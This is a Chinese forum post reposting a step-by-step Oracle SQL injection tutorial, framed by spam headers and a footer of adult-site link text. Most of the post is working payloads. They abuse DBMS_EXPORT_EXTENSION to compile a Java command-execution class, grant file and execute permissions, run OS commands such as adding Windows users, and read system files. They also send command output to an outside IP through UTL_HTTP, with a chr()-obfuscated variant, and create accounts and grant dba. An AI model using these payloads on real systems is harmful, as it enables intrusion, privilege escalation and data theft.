久久中文视频-久久中文网-久久中文亚洲国产-久久中文字幕久久久久-亚洲狠狠成人综合网-亚洲狠狠婷婷综合久久久久


曙海教育集團(tuán)論壇開(kāi)發(fā)語(yǔ)言培訓(xùn)專(zhuān)區(qū)Oracle數(shù)據(jù)庫(kù) → 犀利的 oracle 注入技術(shù)


  共有91394人關(guān)注過(guò)本帖樹(shù)形打印

主題:犀利的 oracle 注入技術(shù)
美女呀,離線,留言給我吧!
wangxinxin
   1樓 個(gè)性首頁(yè) | 博客 | 信息 | 搜索 | 郵箱 | 主頁(yè) | UC


加好友 發(fā)短信
等級(jí):青蜂俠 帖子:1393 積分:14038 威望:0 精華:0 注冊(cè):2010-11-12 11:08:23 		犀利的 oracle 注入技術(shù)  發(fā)帖心情 Post By:2010-12-11 11:04:20

介紹一個(gè)在web上通過(guò)oracle注入直接取得主機(jī)cmdshell的方法。

以下的演示都是在web上的sql plus執(zhí)行的,在web注入時(shí) 把select SYS.DBMS_EXPORT_EXTENSION.....改成
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用" 'a'|| "是為了讓語(yǔ)句返回true值)

語(yǔ)句有點(diǎn)長(zhǎng),可能要用post提交。

以下是各個(gè)步驟:
1.創(chuàng)建包
通過(guò)注入 SYS.DBMS_EXPORT_EXTENSION 函數(shù),在oracle上創(chuàng)建Java包LinxUtil,里面兩個(gè)函數(shù),runCMD用于執(zhí)行系統(tǒng)命令,readFile用于讀取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''  
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)

------------------------
如果url有長(zhǎng)度限制,可以把readFile()函數(shù)塊去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''  
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
同時(shí)把后面步驟 提到的 對(duì)readFile()的處理語(yǔ)句去掉。
------------------------------
2.賦Java權(quán)限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual

3.創(chuàng)建函數(shù)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''   
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual

select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''   
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual

4.賦public執(zhí)行函數(shù)的權(quán)限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual

5.測(cè)試上面的幾步是否成功

and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6.執(zhí)行命令:

/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)

/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)

注意sys.LinxReadFile()返回的是varchar類(lèi)型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看運(yùn)行結(jié)果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual

或者UTL_HTTP.request(:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)

/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
注意:用UTL_HTTP.request時(shí),要用 REPLACE() 把空格、換行符給替換掉,否則會(huì)無(wú)法提交http request。用utl_encode.base64_encode也可以。


--------------------
6.內(nèi)部變化
通過(guò)以下命令可以查看all_objects表達(dá)改變:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.刪除我們創(chuàng)建的函數(shù)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''   
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual



====================================================
全文結(jié)束。謹(jǐn)以此文贈(zèng)與我的朋友。
linx
124829445
2008.1.12
edu.cn" target="_blank">[email protected]


======================================================================
測(cè)試漏洞的另一方法:
創(chuàng)建oracle帳號(hào):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual

即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual

確定漏洞存在:
1<>(
select user_id from all_users where username='LINXSQL'
)
給linxsql連接權(quán)限:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
刪除帳號(hào):
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual

======================
以下方法創(chuàng)建一個(gè)可以執(zhí)行多語(yǔ)句的函數(shù)Linx_query(),執(zhí)行成功的話返回?cái)?shù)值"1",但權(quán)限是繼承的,可能僅僅是public權(quán)限,作用似乎不大,真的要用到話可以考慮grant dba to 當(dāng)前的User:

1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''   
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
) and ...

1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on Linx_query to public'''';END;'';END;--','SYS',0,'1',0) from dual
) and ...
1.jsp?id=1 and '1'<>(
SELECT sys.Linx_Query('SELECT 14554 FROM DUAL') FROM DUAL
) and ...

1.jsp?id=1 and '1'<>(
SELECT sys.Linx_Query('declare pragma
autonomous_transaction; begin execute immediate ''
select 1 from dual
''; commit; end;') from dual
) and ...

多語(yǔ)句:
SELECT sys.Linx_Query('declare temp varchar2(200); begin select 1 into temp from dual; select 2 into temp from dual; end;') from dual

創(chuàng)建用戶(hù)(除非當(dāng)前用戶(hù)有system權(quán)限,否則無(wú)法成功):
SELECT sys.Linx_Query('declare pragma
autonomous_transaction; begin execute immediate ''
CREATE USER Linx_Query_User IDENTIFIED BY Linx_Query_User
''; commit; end;') from dual


================
以下的方法是先建立函數(shù)Linx_Query(),再建立 RunCMD2()
1.創(chuàng)建函數(shù)
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''   
create or replace function Linx_Query (p
varchar2) return number authid current_user is begin execute immediate
p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual;

如果有權(quán)限,以下語(yǔ)句應(yīng)該允許正常
select sys.linx_query('select 1 from dual') from dual;
不然的話運(yùn)行:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
grant dba to 當(dāng)前的User'''';END;'';END;--','SYS',0,'1',0) from dual


2.創(chuàng)建包
SELECT sys.Linx_Query('declare pragma
autonomous_transaction; begin execute immediate ''
create or replace and compile java source named "LinxUtil2"   as import java.io.*;public class LinxUtil2 extends Object {public static String RunCMD(String args) throws IOException{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) );  String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";return str;}}''; commit; end;') from dual
3.創(chuàng)建函數(shù)
SELECT sys.Linx_Query('declare pragma
autonomous_transaction; begin execute immediate ''
create or replace function RunCMD2(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil2.RunCMD(java.lang.String) return String'''';''; commit; end;') from dual
4.給權(quán)限
給用戶(hù)SYSTEM執(zhí)行權(quán)限:
SELECT sys.Linx_Query('declare pragma autonomous_transaction;begin dbms_java.grant_permission( ''SYSTEM'', ''SYS:java.io.FilePermission'', ''<<ALL FILES>>'', ''execute'' );end;') from dual

5.執(zhí)行函數(shù)
select RunCMD2('cmd /c dir') from dual
支持(0中立(0反對(duì)(0單帖管理 | 引用 | 回復(fù) 回到頂部

返回版面帖子列表

犀利的 oracle 注入技術(shù)
簽名
主站蜘蛛池模板: 欧美大片毛片aaa免费看 | 欧美国产日韩一区二区三区 | 成人18网址在线观看 | 国产精品久久久久影院色 | 亚洲国产精品欧美日韩一区二区 | 高清在线一区二区三区亚洲综合 | 免费一级欧美在线观看视频片 | 欧美丰满大乳大屁股毛片 | 国产性videostv另类极品 | 99热久久国产这里是精品 | 在线精品免费视频 | 99精品久久久久久 | 日本黄色免费大片 | 国产一级二级三级视频 | 日韩视频一区二区三区 | 欧美日韩精品一区二区三区高清视频 | 中文字幕在线乱码不卡区区 | 国产成人免费高清视频网址 | 国产特黄特色的大片观看免费视频 | 日产一区两区三区四区 | 免费国产午夜高清在线视频 | 国产三级在线观看播放 | 国产在线99| 亚洲精品国产福利 | 国产中文字幕在线免费观看 | 一个人看的www片免费视频中文 | 成人黄网大全在线观看 | 男人一进一出桶女人视频 | 女人夜色黄网在线观看 | 国产系列 视频二区 | 久草在线视频资源站 | 亚洲国产欧美日韩精品一区二区三区 | 色偷偷女男人的天堂亚洲网 | 精品免费国产 | 美女作爱网站 | 亚洲国产99 | 手机在线成人精品视频网 | 黄色网点 | 亚洲精品国产一区二区在线 | 91久久亚洲精品国产一区二区 | 国产97在线观看 |